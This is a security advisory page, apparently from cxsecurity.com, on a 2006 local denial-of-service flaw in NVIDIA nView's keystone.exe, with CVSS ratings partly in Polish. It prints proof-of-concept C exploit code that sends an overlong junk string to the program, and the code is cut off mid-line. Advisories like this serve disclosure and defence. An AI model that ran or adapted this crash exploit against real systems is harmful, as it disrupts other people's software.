NVIDIA nView (keystone) local Denial Of service

2006.12.07
Credit: Hessam-x
Risk: Low
Local: Yes
Remote: Yes
CWE: CWE-Other


Ogólna skala CVSS: 5/10
Znaczenie: 2.9/10
Łatwość wykorzystania: 10/10
Wymagany dostęp: Zdalny
Złożoność ataku: Niska
Autoryzacja: Nie wymagana
Wpływ na poufność: Brak
Wpływ na integralność: Brak
Wpływ na dostępność: Częściowy

The nVIDIA nview keystone is vulnerable to a Denial of Service attack. A attacker could exploit this vulnerability by sending junk data to keystone.exe. === Exploit == /* NVIDIA nView (keystone) local Denial Of service (c)oded By Hessam-x / www.Hessamx.net */ #include <stdio.h> #include <string.h> #include <windows.h> int main() { char junk[] = "a"; char box[650]; char *buf; int i; printf("-:: NVIDIA nView (keystone) Denial Of service n"); printf("-:: Coded By Hessam-x / www.hessamx.net n"); strcpy(box,"a"); for (i = 0; i < 600; i++) { strcat(box,junk); } buf = (char *) malloc(650); strcpy (buf,"keystonet"); strcat (buf,box); buf[650-1]='


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top